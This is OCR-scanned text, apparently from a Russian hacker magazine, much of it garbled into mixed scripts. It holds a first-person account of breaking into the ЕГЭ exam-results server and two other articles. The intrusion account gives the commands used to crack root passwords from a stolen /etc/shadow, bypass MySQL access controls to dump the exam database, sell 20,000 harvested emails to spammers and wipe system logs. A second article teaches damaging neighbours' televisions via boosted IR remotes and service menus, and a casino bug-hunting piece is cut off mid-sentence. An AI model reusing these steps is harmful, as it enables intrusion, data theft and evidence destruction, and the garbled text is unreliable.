Но, как ты помнишь, 22 порт нещадно — движка сайта. Вспомнив об архивах, я 

фильтровался, а у соппЬаск-шелла не было I .быстренько набрал команду сііг с: /В /3 I ІіпсІ 



псевдотерминала. Если я наберу команду 
зи, то система будет ругаться на отсутствие 
■Щур и не даст мне сменить пользователя. 
-Здесь можно было выбрать два варианта: 
либо залить портированный эмулятор Ну под 
фряху, либо воспользоваться ехресі-сце- 
нарием. Я выбрал третий вариант — просто 
-написал ззИ ап1:опіс@ІосаІИозІ и интерактив- 
но ввел пароль. И не ошибся. Я был внутри, 
но уже с группой ѵѵИееІ! 

«Ну, пробил я головой стенку, и что я буду 
-делать в соседней камере?», — подумал я. 
Прочитав хистори Антоника в надежде най- 
_ти там рутовый пароль, я снова обломался: 
оказывается, этот лопоухий юзер ни разу 
не переключался на рута :(. Все это ввергло 
-меня в большие печали, но тут я решил про- 
сканировать всю подсеть 85.142.20.50/29 на 
наличие иных серверов. 

Резвый птар (мне повезло, что он входит в 



/і «Іаг», и она вывела меня на истинный путь. 
В дебрях Ооситепіз апсі ЗеНіпдз у админа 
(в Тетр-каталоге) я нашел файл Ьаскир.іаг. 
~дг. Я тотчас подумал, что это базы ЕГЭ! В 
момент составив РТР-сценарий для сервера 
ааЫосс4.сИа1:.ги (как это делать, ты уже зна- 
ешь), я вывел архивчик. Но, как оказалось, 
там находилась копия каталогов /Йоте, /еіе 
_у\ /гооБ Скорее всего, администратор пот- 
рошил внутренности своей фряхи и забыл 
"почистить ТЕМР (кстати, загляни туда и уди- 
-вись, какой хлам находится в этой папке. На 
-самом деле, даже факт наличия /еІс/зИасІоѵѵ 
заставлял меня радоваться жизни. 

Первое, что я сделал, — это загрузил ЗоИп 
“брутать рутовый пароль сервера ЕГЭ по 100 Мб 
-русскому/английскому словарю. Собствен- 
_но, команда запуска была следующей: 

ІоИп -ѵѵ Ьід_ѵѵогсІ8 -гиіез зіпасіоѵѵ > зіпасі.епсгурі: 



А был ли ѴѴіпсІоѵѵз? 

Ночью, повторив все вышеописанные шаги, 
я снова был в системе. Фряха, как я уже гово- 
рил, являлась достаточно новой, поэтому об 
эксплоитах я и думать забыл. Была надежда, 
что найдется какая-то зацепка, и я сдвинусь 
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■поставку РгееВЗО) показал еще один вклю- 

.ченный компьютер в этой подсети с отпечат- Я думал, что мне придется тырить хэши из 

ком ѴѴіпХР без сервиспаков. Сначала я поду- ѴѴіпсІоѵѵз и ломать их, чтобы подставить в 
мал, что это шутка или недоразумение, ведь рутовый пароль. Но таких сложностей уда- 
'таких машин в сети днем с огнем не сыщешь, лось избежать, так как Джоник справился 
■Как оказалось позже, это действительно — с паролем на моем Р4 за 1 65 минут (точное 

была голая винда, до зубов зафайерволен- время). Администратор мог опять поменять 
ная изнутри. Единственный доверенный хост, пароль, ведь архив был довольно старым, 
как ты понимаешь, был этот Ыпих-сервер (а Но удача мне улыбнулась, и команда зи гооі 
■быть может, и вся подсеть). — увенчалась успехом. Я был королем бала! 

.Попробовав опять-таки портированный под — 
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Добиваем СУБД 

Первое, про что я вспомнил, — конфиги 
Му80І_ :). Размеренным шагом зайдя в ѵѵеЬ- 
каталог, я прочитал конфиг. Там была инфа 
о том, как подцепиться к локальной базе 
зііе. Выполнив тузці -иизег -рразз -е 'збоѵѵ 
баіабазез', я увидел несколько неброских баз 
(видимо, для различных проектов), а также 
■интересную базу с названием едеОб. В списке 
.также мелькала база зііе. Следующий запрос 
был уже более конкретен: тузці -иизег -рразз 
-е 'зИоѵѵ іаЫез едеОб'. Правда, сразу после 
нажатия епіег, я был послан нафиг — у меня 
.не было прав для входа в базу едеОб. 

Мне надоело быть ущемленным в правах, 
поэтому я поступил проще: решил временно 
убить тузціб, перезапустить его в режиме -- 
■зкір-дгапМаЫез, слить дамп всей базы едеОб и 
запустить демон в обычном режиме. Учитывая, 
что за окном была кромешная тьма, я подумал, 
что не смущу этим случайных посетителей сай- 
та, и выполнил ряд команд. Правда, мне при- 
шлось посидеть и погрызть ногти пару минут ; 
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пока база дампилась на жесткий диск. После 
перезапуска СУБД я аккуратно забэкапил и 
базу зііе, так как в ней было под 20000 е-таіі 
адресов и паролей (пускай и зашифрованных 
-ІТ1СІ5). Резервную копию делал, конечно же, 
командой тузцібитр -игооі едеОб > еде.зді. 
Затем, аккуратно выложив заархивированную 
копию бэкапа, я быстро стянул ее со своего 
-шустрого дедика. 

Что было дальше, ты, наверное, и сам 
сможешь угадать. Просмотрев по диагонали 
результаты ЕГЭ, я решил не искать лишних 
-приключений, а просто удалил архив. 
Впрочем, никто мне не мешал продать 
результаты, или еще хуже — изменить их на 
сервере (кто знает, может, это и была база 
первоисточника), но я не хотел торопиться. 
Единственное, что я сделал, так это продал 
местным спамерам базу из 20000 е-таіі 
адресов. Ведь взлом производился отнюдь 
не из-за денег, скорее из-за простого ин- 
тереса. После этого случая под мой прицел 
акже попал официальный сайт Министерс- 



тва образования РФ еб.аоѵ.ги ... Но это уже 
тема другой статьи, □: 



Особое внимание я уделил чистке ло- 
гов во Фряхе и Винде. Если первая про- 
блема решалась простыми фильтра- 
циями типа дгер -ѵ ір /ѵаг/Іод/теззадез 
> Чтр; тѵ Чтр /ѵаг/Іод/теззадез, то с 
Виндой мне пришлось попотеть. Дело 
в том, что я очень волновался, что не- 
затейливо отправил машину в ребут. 
Но разрулить проблему мне помог- 
ла очень полезная утилитка сіеагеі 
( ИДр://ФеФіп.пе 1 /сІеагеІ. 2 Ір У которая 
при запуске очищает весь системный 
журнал. Единственное, над чем мне 
пришлось попариться, так это над за- 
ливкой этой программы на виндовый 
сервак. Но, как говорится, искусство 
взлома требует жертв. 













ВСЕ МЫ ИСПОЛЬЗУЕМ ПУЛЬТЫ ДИСТАНЦИОННОГО УПРАВЛЕНИЯ НА ИК-ОСНОВЕ, 
НО ДАЛЕКО НЕ КАЖДЫЙ ЗНАЕТ, КАКИЕ ВОЗМОЖНОСТИ И ОПАСНОСТИ ОНИ ТАЯТ. 
ПОМИМО «НЕСАНКЦИОНИРОВАННОГО» ПЕРЕКЛЮЧЕНИЯ КАНАЛОВ У СОСЕДА, 
ХАКЕР МОЖЕТ ПРОНИКНУТЬ В ИНЖЕНЕРНОЕ МЕНЮ, ЧУДОВИЩНО ИСКАЗИВ ГЕО- 
МЕТРИЮ ЭКРАНА, ОТКЛЮЧИВ РАЗВЕРТКУ ИЛИ УБИВ ТЕЛЕВИЗОР КАКИМ-НИБУДЬ 
ДРУГИМ СПОСОБОМ. 
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Вся информация в этой статье дана лишь в 
ознакомительных целях. За любое незаконное 
использование материала автор и редакция не 
несут никакой ответственности. 



Пелевин как-то сказал: «Телевизор — это уни- 
таз, только наоборот: в унитаз серим мы с вами, 
а из телевизора серят на нас». Причем во всей 
физической прямоте этого слова. Но даже не 
это самое страшное. Фактически телевизор 
превращается в пульт дистанционного управ- 
ления телезрителем, являясь не просто одним 
из методов организации видеоряда, а основой 
телевещания — главным способом воздейс- 
твия рекламно-информационного поля на со- 
знание, при котором телезритель становится 
телепередачей, управляемой дистанционно. 
И в этом состоянии он проводит значительную 
часть своей жизни. 

Хакеры телевизор вообще не смотрят, да и 
другим не советуют. А самые радикальные 
группы анархистского толка даже объявляют 
телевизорам священную войну, то есть джихад. 
Помните того пацана, который, оставшись один 
дома (фильм Ноте аіопе), с помощью нехитро- 
го приспособления, сооруженного из пульта 
дистанционного управления, соединенного с 
телескопом, мешал «любимой» соседке смот- 
реть телевизор, постоянно переключая кана- 
лы?Уверен, что многие пытались повторить его 
подвиг, но достичь успеха удалось единицам. 
Хотите узнать почему? 

Оставив морально-юридический аспект вопро- 
са догнивать на помойке, возьмем свой собс- 
твенный телевизор и попробуем извратиться 
с ним по полной программе. Посмотрим, как 
далеко мы сможем зайти, и что у нас получится 
с ним сделать. 

Боевая экипировка 

Для дистанционного управления телевизором 
нам потребуется пульт, совместимый с типом 
атакуемой жертвы на уровне протоколов моду- 
ляции и команд управления. Систем модуляции 
всего три: 

1. Система ІТТ, разработанная компанией 
(ЗЛІІІ\ЮІ(3 и основанная на измерении интер- 
валов времени между последовательностью 
коротких импульсов излучения (в настоящее 
время практически полностью вышла из упо- 
требления). 

2 . Система ПС-5, разработанная компанией 
РНІЫРЗ, использует метод двухфазовой пере- 
дачи данных, модулирующий постоянный несу- 
щий сигнал (используется и по сей день, но все 
реже и реже, да и то в основном в отечествен- 
ных телевизорах). 

3. Система ЗІЕМЕЫЗ, разработанная одно- 
именной компанией и модулирующая высоко- 
частотный несущий сигнал (частота которого, 
кстати говоря, может варьироваться в широких 
пределах) навороченным цифровым протоко- 
лом, поддерживающим среди прочих фич еще 
и синхронизацию приемника с передатчиков. 
Пользуется большой популярностью у зару- 
бежных телестроителей. 

В настоящее время чаще всего используется 
объединенная система ВС-5+5ІЕМЕІМЗ, реали- 
зованная в микросхемах практически всех по- 
пулярных производителей: РНІЫРЗ, ЗІЕМЕІМЗ, 
ТНОМЗОЫ, ЗАМЗІІІМС, І_С и др. Теоретически 



можно создать универсальный пульт, подде- 
рживающий одновременно множество моделей 
телевизоров. И такие пульты уже представлены 
на рынке (изготовленные, как правило, кустар- 
ным способом). Если же такого пульта нет, то 
необходимо приобрести «родной» пульт моде- 
ли-жертвы, который сейчас продается прак- 
тически в любом магазине, торгующем теле- и 
аудиотехникой. 

По паспорту, номинальный рабочий диапазон 
пульта редко превышает несколько десятков 
метров (да и то лишь на свежих батареях). Учи- 
тывая невысокую плотность расположения 
домов, для диверсионных целей такого пора- 
жающего радиуса оказывается недостаточно, 
и без серьезной «хирургической» доработки 
здесь не обойтись! Можно, конечно, приложить 
пульт к окуляру телескопа типа «Мицар» или 
«Альтаир», выпускаемых Новосибирским при- 
боростроительным заводом, и, прицелившись 
через искатель, вести огонь прямой наводкой, 
расстреливая телевизоры в домах напротив. 
Однако тут надо учесть, что коэффициент пре- 
ломления инфракрасных лучей заметно отли- 
чается от видимого света, поэтому визуальная 
фокусировка невозможна! Необходимо выпол- 
нить перерасчет или подобрать положение фо- 
кусировочного кольца экспериментально. Но 
все равно телескоп — это дорого, громоздко 
и неудобно. Гораздо проще (и дешевле) дора- 
ботать сам пульт, а для этого его необходимо 
вскрыть, орудуя кухонным ножом, как показано 
на рисунке. 

После извлечения печатной платы из корпуса 
мы увидим излучающий инфракрасный свето- 
диод, один из выводов которого, как правило, 




Трепанация пульта дистанционного управ- 
ления 



подключается к общему проводу (то есть, к мас- 
се), а другой — к коллектору биполярного вы- 
сокочастотного транзистора. Предельную яр- 
кость ограничивает резистор, подключенный 
к базе (см. рисунок). Уменьшив сопротивление 
«базового» резистора (например, подпаяв па- 
раллельно ему еще один), мы увеличим яркость 
свечения светодиода, и «дальнобойность» 
пульта резко возрастет. Любители экстремаль- 
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Структурная схема типового 
пульта дистанционного управ- 
ления 



ных ощу- 
щений могут 
перерезать 
питающую 
дорожку, веду- 
щую к эммитору, 
и подать на тран- 
зистор до 5 Вольт. 

Светодиод замор- 
гает как сумасшед- 
ший, и, несмотря 
на то, что он скоро 
сгорит, за это время с 
таким пультом можно 
успеть многим навре- 
дить, хотя это будет уже 
не хакерство, а самое на- 
стоящее варварство. 

Серьезные охотники уда- 
ляют светодиод, заменяя 
его лазерным излучателем. 

Лазерные указки — самое 
доступное оружие, но, увы, да- 
леко не самое лучшее, посколь- 
ку их рабочий диапазон лежит в 
видимом свете, а фотоприемник 
телевизора защищен инфракрас- 
ным светофильтром, значительно 
ослабляющим видимый свет. Поэ- 
тому потребуется достаточно мощ- 
ная указка, для «раскачки» которой 
одного транзистора может уже не хва- 
тить, и придется подпаивать дополни- 
тельный каскад, а для этого необходимо 
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нѳ только владеть навыками пайки, но и иметь 
некоторые познания в электронике. 
Сторожевые системы (которые легко найти в 
магазинах, торгующих радиоконструкторами 
или заказать по почте) зачастую используют 
инфракрасные лазеры, идеально подходящие 
для охотничьих целей. В зависимости от фанта- 
зии и умения работать руками (по металлу) конс- 
трукции орудия могут быть различными. Кто-то 
засовываетлазерный излучатель прямо в ствол 
пневматической винтовки, кто-то вытачивает 
специальную насадку на бинокль или подзор- 
ную трубу, юстируя ее так, чтобы центр «креста 
нитей» окуляра совпадал с инфракрасным лу- 
чом . Работает такое устройство практически на 
любых расстояниях, ограниченных одним лишь 
горизонтом видимости, однако если требуется 
пострелять в жильцов, живущих снизу или свер- 
ху, то ничего не получится. Разве что забраться 
на крышу соседнего дома или подобрать только 
что выпаянный светодиод, прикрепив его к те- 
лескопической штанге, которую охотник смо- 
жет двигать во всех направлениях. 
Достоинство светодиода (по сравнению с ла- 
зером) в том, что он дает расходящийся пучок 
света, многократно отражаемый от предметов 
окружающей обстановки (никто из вас не про- 
бовал управлять телевизором, направив пульт 
в потолок или противоположную стену?), поэ- 
тому «подстрелить» жертву становится очень 
легко — даже необязательно прицеливаться. 
Главный (и, пожалуй, единственный) минус 
такого решения в том, что интенсивность изу- 
чения убывает пропорционально квадрату рас- 
стояния, вто время как лазер дает практически 
параллельный пучок. Короче, залогом успеш- 
ной охоты становится богатый инвентарь. В од- 
них случаях применяется одно оружие, в других 
— другое. 

Мелкие пакости 

Итак, вражеский телевизор лежит в перекрес- 
тье прицела, влажные от волнения пальцы за- 
стыли на пульте. Самое простое, что можно сде- 
лать (не привлекая к своей персоне никакого 
внимания), — это нащупать большую красную 
кнопку и вдавить ее до упора, отправляя теле- 
визор в ждущий режим типа зіапсІЬу. После 
нескольких таких самопроизвольных отклю- 
чений, агрегат, как правило, отправляется хо- 
зяевами на лечение в ближайшую мастерскую 
(очень помогает против соседей, увлекающих- 
ся повышенной громкостью по ночам, когда 
все нормальные хакеры занимаются отладкой 
программ, требующей глубокой сосредоточен- 
ности, граничащей с медитацией, и все посто- 
ронние звуки высаживают на глухую измену, то 
есть раздражают). Еще можно поиграть пере- 
ключателем каналов, кнопкой «тиіе», регуля- 
торами яркости, насыщенности и контраста, 
но, поскольку все эти действия отображаются 
на экране, жертва быстро сообразит, где тут 
собака зарыта, и займется поисками охотника, 
наблюдая за окнами соседних домов. Чтобы 
не быть пойманным и растерзанным без суда 
и следствия, необходимо заблаговременно по- 



заботиться о маскировке. 

Некоторые хакеры практикуют совершенно 
изумительный трюк: включая телевизор в от- 
сутствие хозяев, они запускают режим «руч- 
ного» поиска станций и заводят все каналы 
на «пустоту». Внешне это выглядит так, как 
будто-то телевизор «теряет» каналы, что мог- 
ло быть вызвано, например, выходом из строя 
микросхемы энергонезависимой памяти, про- 
грамматора или фильтров в цепях питания. 
Дефекты подобного рода встречаются доста- 
точно редко, но относятся к разряду «трудных» , 
и телемастер может ковыряться в телевизоре 
целый месяц, прежде чем придет к выводу, что 
источник сбоев приходит откуда-то извне. Но 
по сравнению с тем, что ждет нас впереди, это 
всего лишь невинные шалости. В конце концов, 
каналы можно настраивать каждый раз перед 
просмотром. 

С телевизорами, имеющими парольную за- 
щиту от детей, все обстоит намного хуже. По 
умолчанию она не задействована, и хакер 
свободно может установить любой пароль, 
предварительно заблокировав доступ ко всем 
органам управления. Подобрать пароль за 
разумное время практически невозможно, и 
для снятия блокировки приходится перепрог- 
раммировать микросхему энергонезависимой 
памяти, а для этого необходимо иметь фирмен- 
ную прошивку, которая есть только в крупных 
сервисных центрах, да и то не во всех. Но даже 
если ее раздобыть (контрабандой или счи- 
тыванием с телевизора идентичной модели), 
все индивидуальные настройки, касающиеся 
фокусировки, геометрии, цветового баланса и 
даже разгонных напряжений кинескопа, ока- 
жутся безвозвратно утерянными, и качество 
изображения резко упадет. Теоретически все 
параметры можно отстроить заново, но дале- 
ко не каждый мастер захочет с этим возиться, 
да и невозможна такая настройка в условиях 
маленькой мастерской. Без специальных (и 
весьма дорогостоящих) генераторов сигналов 
здесь не обойтись, а значит, после ремонта о 
прежнем качестве можно и не мечтать. (Не- 
большая ремарка: среди телемастеров также 
встречаются хакеры, которые знают, где имен- 
но хранится пароль и как он обнуляется, но та- 
ких еще поискать надо). 

Кстати говоря, огромным достоинством боль- 
шинства телевизоров ЗАМЗІІЫО является 
автоматическая загрузка базовой прошивки 
из ПЗУ: достаточно установить чистую микро- 
схему памяти (как правило, марки ІС902), вклю- 
чить телевизор в сеть и оставить его в ждущем 
режиме на 10-15 секунд. Но при этом вместе с 
прошивкой переписываются и настройки по 
умолчанию, то есть для достижения качествен- 
ного изображения их все равно придется пере- 
настраивать заново. 

Внутри инженерного меню 

Практически все современные телевизоры 
(ЭѴО-плееры и прочие устройства) имеют спе- 
циальные инженерное меню (зегѵісе тепы), 
дающие доступ к настройке служебных пара- 



метров (фокусу, геометрии экрана, цветовому 
балансу, еіс) и скрытым возможностям типа 
НОТЕІ_ МСЮЕ (режим «отеля»). Это очень по- 
лезный режим для телевизоров, установленных 
в гостиницах или мотелях, который блокирует 
все функции пульта управления, кроме пере- 
ключения каналов, а при необходимости еще 
и ограничивающий максимальную громкость 
звука, чтобы она никому не мешала. Только 
представьте, как обрадуется владелец телеви- 





Вход в инженерное меню телевизора 
80А/У КѴ 29ГХ осуществляется только 
через кнопки, расположенные на лице- 
вой панели 



зорасзаблокированным пультом и громкостью, 
сбавленной до нуля. А ведь разблокировать все 
можно только в мастерской ! 

Вызов инженерного меню, как правило, осу- 
ществляется недокументированной комбина- 
цией клавиш штатного пульта дистанционного 
управления. Реже — кнопок лицевой панели, 
расположенных непосредственно на самом 
телевизоре (см. рисунокЗ). В частности, линей- 
ка ЗОІЧѴ КѴ 29РХ требует удерживать клавиши 
РРОО и РРОО при включении питания. Пульт 
дистанционного управления при этом начисто 



Специализированные пульты управле- 
ния, предоставляющие доступ к инже- 
нерному меню 
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игнорируется, что делает эти модели непод- 
властными взлому. К радости хакеров, таких 
телевизоров относительно немного. Произво- 
дители все еще не осознали угрозу, исходящую 
от инженерного меню, а потому не предприни- 
мают никаких шагов для его защиты. 

В исключительных случаях требуется специ- 
альный пульт управления, который можно при- 
обрести на радиорынке, или собрать на основе 
уже готовых пультов по схемам, найденным 
в сети (например, топііог.езрес.ѵѵз/зесііопі/ 
1оріс60458.ИітІ ). Ведь, по сути дела, все сво- 
дится к изучению определенной последова- 
тельности инфракрасных импульсов, которую 
очень легко запрограммировать на любом про- 
цессоре (хоть на том же ПК с ИК-адаптером). 
Некоторые модели телевизоров фирмы ЗНАВР 
позволяют добраться до инженерного меню 
только через непосредственное вмешатель- 
ство в цепь управления процессором (в част- 
ности, модель 14/21 Л\І1 требует подачи 5 Вольт 
на 37 лапу микроконтроллера). Однако это уже 
экзотика, достойная лишь упоминания, но не 
более того. Основное внимание мы сосредото- 
чим на телевизорах, вызывающих инженерное 
меню определенной комбинацией клавиш со 
штатного пульта управления. 



Г млкѵэ еффічвинжа іілннк->мв 





Коллекция описаний комбинаций кла- 
виш для входа в инженерное меню раз- 
ной аппаратуры 

Комбинация эта у каждого семейства теле- 
визоров своя. Она отсутствует в руководстве 
пользователя, но с той или иной степенью 
подробности описывается в технической до- 
кументации, распространяемой в узком кругу 
сервисных центров или аттестованных теле- 
мастеров. Никакого секретаонане представля- 
ет и чаще всего отдается без всякого ЫОА (Ыоп 
— Оізсіозиге Адгеетепі — отдаленный аналог 
советской «подписки о неразглашении», не пу- 
тать с Ыаііопаі Огид Адепсу, сформированным 
в Риме 1 января 1999 года). Поэтому на многих 
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Вызов инженерного меню на телевизорах 
50 МУ (не для всех моделей!) 




Журнал «Ремонт электронной техники» 




радиолюбительских сайтах можно найти целую 
коллекцию подобных комбинаций, крупнейшим 
из которых является ѵѵѵѵѵѵ.іеіетазіег.ги . 

Много полезной информации публикует и жур- 
нал «Ремонт электронной техники» ( ѵѵѵѵѵѵ.еіср. 
ш), но, к сожалению, в открытый доступ выло- 
жены только журналы, опубликованные до се- 
редины 2003 года, а за остальные приходится 
платить. Впрочем, телевизоры в плане обнов- 
ления (ирдгабе) намного более консервативны, 
чем компьютеры 5-10-летней давности. К счас- 
тью, инженерное меню подробно описано в чет- 
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взлом 




На ЭѴЭ-диске мы выложили сборники комбина- 
ций клавиш для входа в цифровое меню телеви- 
зоров. В документации охвачены практически 
все модели старых и новых телеков. 




Форум мастеров Е5РЕС 



вертом и пятом номерах РЭТ'а за 2001 год. 
Можнообратитьсязапомощьюнакакой-нибудь 
ремонтный форум, например на ІтНр://топі1ог. 
езрес.ѵѵз/зесііопі/ . С определенной степенью 
вероятности там помогут. 

Наконец, можно приобрести весьма недурс- 
твенную книжку Ноте ТИеаіег Наскз от О'РеіІІу 
(см. рисунок 8) — там целый раздел посвящен 
взлому инженерных меню, но перечня конкрет- 
ных комбинаций клавиш для каждой модели те- 
левизора, увы, нет. 




ТНЕАТЕП 

НАСК З 




Как превратить утюг в космический ко- 
рабль, оставшись при этом на свободе 



В частности, для большинства телевизоров 
фирмы ЗОІЧѴ вызов инженерного меню осу- 
ществляется так: в режиме ЗіапбЬу (когда го- 
рит красный светодиод на лицевой панели), 
нажимается следующая последовательность 
клавиш на пульте управления. 




Схема тичный вид инженерного меню теле- 
визоров 50А/Ѵ 



Если все ОК, то телевизор немедленно пере- 
ключается в так называемый ТТ-режим (Іетро 
Ііте), легко опознаваемый по надписи «ТТ-» 
в верхнем правом углу экрана и статусной ин- 
формацией ниже него. 

Переход в сервисное меню из ТТ-тобе осу- 
ществляется двукратным нажатием клавиши 
<тепи> на пульте управления до появления 
следующей картинки. Что делать дальше — со- 
образить нетрудно. Перемещаясь по пунктам 
меню «джойстиком» (кнопка <іоузІіск>), подво- 
дим курсор к нужному пункту и нажимаем <ОК>. 
Выход из инженерного меню обычно происхо- 
дит по нажатию ЗіапбЬу на пульте управления 
(с сохранением всех измененных параметров) 
или путем выдергивания шнура телевизора из 
розетки (измененные параметры при этом не 
сохраняются). Кстати говоря, последнюю опе- 
рацию можно реализовать и удаленно, воору- 
жившись пневматической винтовкой, перебив 
силовой шнур (шутка!) или обесточив квартиру 
рубильником на щитке. 

Любопытный нюанс: большинство телевизоров 
имеет специальный счетчик входов в инженер- 
ное меню, и если в сервисном центре увидят, 
что здесь кто-то уже побывал, то в гарантийном 
ремонте могут запросто отказать, выставив 
клиента пинками за дверь. Впрочем, это не сов- 
сем законно, и поэтому может быть обжаловано 
в суде, только вряд ли что из этого получится. 
Основная сложность заключается в том, что 
экран телевизора-жертвы зачастую недосту- 
пен охотнику, и все действия приходится вы- 
полнять вслепую, а для этого необходимо за- 
ранее потренироваться нателевизоре схожей 
или идентичной модели. Названия большинс- 
тва пунктов говорят сами за себя, и при жела- 
нии качество изображения можно не только 
ухудшить, но и улучшить! Особенно это каса- 
ется бракованных партий, распространяемых 
«серыми» дилерами, или телевизоров, соб- 
ранных «по лицензии» в соседнем подвале. 
Так устраняются геометрические искажения, 
уходит краснота лиц и многие другие дефекты, 
объясняющиеся небрежной настройкой, кото- 
рая в условиях подпольной сборки становится 
слишком обременительной. 

Находясь в сервисном меню, следует соблю- 
дать величайшую осторожность и ни в коем 
случае не менять тех пунктов, назначение ко- 
торых доподлинно неизвестно. Одно неверное 
движение может запросто «убить» телевизор! 
Достаточно отключить развертку, чтобы инже- 
нерное менюуженикогдане появилось на экра- 



не. Теоретически, вернуть настройки можно и 
вслепую, но в условиях сервис-центра гораздо 
проще заменить микросхему энергонезависи- 
мой памяти. 

Однако это еще не самое страшное! Некото- 
рые настройки (особенно связанные суправля- 
ющими токами и напряжениями) могут вывести 
из строя несколько узлов! 

А что же насчет мониторов? Процессорные 
блоки у них появились уже давно, а сейчас 
все чаще и чаще начинают попадаться и пуль- 
ты управления (очень удобно, когда монитор 
используется и как рабочий инструмент, и как 
средство для просмотра ЭѴЭ). Небольшое 
расследование показало, что в наиболее рас- 
пространенных моделях никакого инженер- 
ного меню нет, во всяком случае, его нельзя 
вызывать ни с пульта, ни с лицевой панели. Од- 
нако прогресс не стоит на месте: электронная 
начинка мониторов стремительно усложняет- 
ся, и прошивка начинает играть далеко не пос- 
леднюю роль, а там, где есть прошивка, есть 
и возможность ее обновления или настройки. 
Тем более что сплошь и рядом приходится 
сталкиваться с ситуацией, когда одна и та же 
модель І_СЭ-мониторов, выпускаемая одной 
и той же фирмой, в различных партиях ис- 
пользует матрицы от разных производителей, 
компенсируя разброс параметров настрой- 
кой Іігтѵѵаге. Это может осуществляться не 
только аппаратным путем, но и по цифровому 
или аналоговому интерфейсу с компьютером. 
Протоколы обмена пока что не разглашаются, 
но авторизированные сервисные центры уже 
имеют специальные приборы для «тонкой» 
настройки. Остается только перехватить сиг- 
нал и расшифровать, после чего любой хакер 
запросто сможет написать вирус, если не 
выводящий монитор из строя, то приводящий 
изображение в непотребный вид. 

ЭѴЭ-плееры мы уже упоминали, но не стали на 
них акцентировать внимание, поскольку это 
тема другого разговора. Для охоты они не пред- 
ставляют существенного интереса, поскольку 
недостаточно распространены (по сравнению 
с телевизорами), да и цели у хакера, скорее 
всего, будут другими (например, превратить 
привод в мультизональный, залить хакерскую 
прошивку, поддерживающую новые форматы 
файлов и т. д.). Выводить плееры из строя в силу 
их невысокой цены и отсутствия трудно-восста- 
новимыхуникальных настроек, резону нет. ЭѴЭ 
— это не унитаз. Это хорошая штука. И ломать 
их не нужно. 

Как защититься от вандалов 

Приобретая новый телевизор, заблаговремен- 
но поищите название его модели в интернете с 
ключевыми словами зегѵісе тепы и посмотрите, 
доступен ли вызов инженерного меню с пуль- 
та дистанционного управления? За редкими 
исключениями, инженерное меню никогда не 
закрывается паролем, и поэтому защититься от 
злоумышленников программным путем никак 
не удастся. Лучше выбрать другой телевизор, 
благо на скудность ассортимента жаловаться 
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нынче не приходится. 

С уже купленной аппаратурой дела обстоят на- 
много сложнее. Но ведь не ставить же телеви- 
зор так, чтобы он не был доступен для обстрела 
из окон?! Далеко не каждый располагает жилп- 
лощадью, позволяющей делать такой выбор, да 
и к тому же обстрел может осуществляться не 
только прямой наводкой, но и путем рикошета 
от стен или зеркал (убрать зеркала, на стены 
повесить ковры, на потолок — мрачные мато- 
вые обои в готическом стиле). 

Самое простое и самое надежное решение 
— натянуть на «глазок» фотоприемника кар- 
тонную трубочку длиной ~5 см, зачерненную 
изнутри. Конечно, легальным владельцам це- 
литься пультом управления в телевизор будет 
уже сложнее, но зато это обеспечит надежную 



защиту от хакеров, вандалов и прочих любо- 
пытствующих. 

Заключение 

Современная аппаратура становится все 
сложнее, интеллектуальнее, многофункци- 
ональнее, умнее, но вместе с тем все уяз- 
вимее! Цифровые телевизоры позволяют 
обновлять свою прошивку прямо через те- 
леэфир, а это значит, что любой хакер, воо- 
руженный передатчиком, может внедрить в 
Іігтѵѵаге свой вирус или прочую гадость. 
Грядет эра тотального взлома, когда ло- 
маться будет все, начиная от контроллера 
внутри смывного бочка унитаза и заканчи- 
вая спутниками. Как говорится, «история 
нас учит тому, что ничему не учит» (с) Ва- 



лентин Пашенцев. Разработчики думают о 
чем угодно, но только не о безопасности. И 
хорошо, что большинство дыр эксплуатиру- 
ется хакерами-одиночками, а не професси- 
ональным спецназом противоборствующих 
стран. Наказывать за невинные шалости не 
только глупо, но и преступно! Если подрос- 
тки будут регулярно угонять с военных баз 
самолеты, несущие ядерные боеголовки, 
то судить в первую очередь следует тех, 
кто проектировал систему безопасности, а 
подростков представить к награде (хотя бы 
посмертно). 

Так как в боевой обстановке наличие подоб- 
ной дырки может очень сильно аукнуться, и 
чем раньше удастся ее выявить, тем лучше 
для всех, ос 
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Поиск ошибок в 



работе интернет-казино 



«СТАВК 
ВАШЕМ 
ХВАТАЕ 
НУ ЧТО, 
ПОСЛЕ/ 
ЕНОТОЕ 
НЕ ДАР( 
ГОВОР? 
НА КАЗІ 



НАКАЖІ 





на цитадель алчности 



Введение 

В первую очередь ты должен знать, что играть 
в казино — то же самое, что играть с государс- 
твом и законом, и все нижеописанное — не иг- 
рушки. Однажды, блуждая по просторам интер- 
нета в поисках матрицы, я забрел на один сайт, 
где делают деньги на человеческих слабостях 
— опііпе-казино, то есть цитадель алчности. К 
сожалению, их в последнее время развелось 
очень много. С виду это еще одно обычное кази- 
но, написанное на ТІазИ'е, но один баннер, рас- 
положенный в левом нижнем углу, сразу при- 
влек мое внимание. Там была картинка, которая 
гласила: «Премия за найденную ошибку!». 
Довольно редкая ситуация, когда казино гото- 
во платить за свои ошибки. Кликнув мышкой 
по этой картинке, я узнал, что администрация 
сайта предлагает принять участие в тестирова- 
нии казино и обещает заплатить за найденные 
недочеты и ошибки от 25 до 1000 долларов, в 
зависимости от степени важности :). Не густо, 
но и не пусто. 

Разведка боем 

Итак, в первую очередь — регистрация. Как 
истинный рыцарь, я сразу сообщу хозяевам о 
своих намерениях. Практически сразу же был 
обнаружен недочет при заполнении форм. 
Проверка правильности етаіі'а была реали- 
зована некорректно, и система не принимала 
етаіі'ы, в которых присутствовало тире. Но это 
ерунда, и на ней много не заработаешь — надо 
искать дальше :(. Далее запускаю лазутчика и 
временно передислоцируюсь на кухню, в район 
холодильника. Послеобеденные результаты 
сканирования местности оказались не лучши- 
ми для меня. Видимо, начальник охраны не зря 
получает свои деньги. Все сервисы оказались 
достаточно новыми, и разрушающих заклятий 
для них не было (по крайней мере, у меня). Не 
мешало бы прощупать ошибки в ѴѴеЬ'е, путем 
подставки в тело запроса различной ерунды, 
чтобы найти хоть какую-то зацепку. Но из этого 
ничего не вышло: ошибки есть, но практичес- 
кой ценности не имеют — все работает коррек- 



тно. Перейдя к форуму, увидел всем известный 
рНрВВ, но и здесь ничего не получается — новая 
версия. Комплексный поиск возможных мето- 
дов доступа не дал существенных результатов 
и не принес прибыли. Так и должно было быть, 
потому что ошибки в ѴѴеЬ'е, скорее всего, были 
найдены еще во времена мамонтов, а значит, 
надо искать в другом месте. Поэтому следую- 
щий этап — поиск ошибок в реализации про- 
граммного обеспечения. Единственное, что 
остается, — это сесть в засаду и перехватывать 
все входящие и выходящие обозы, то есть про- 
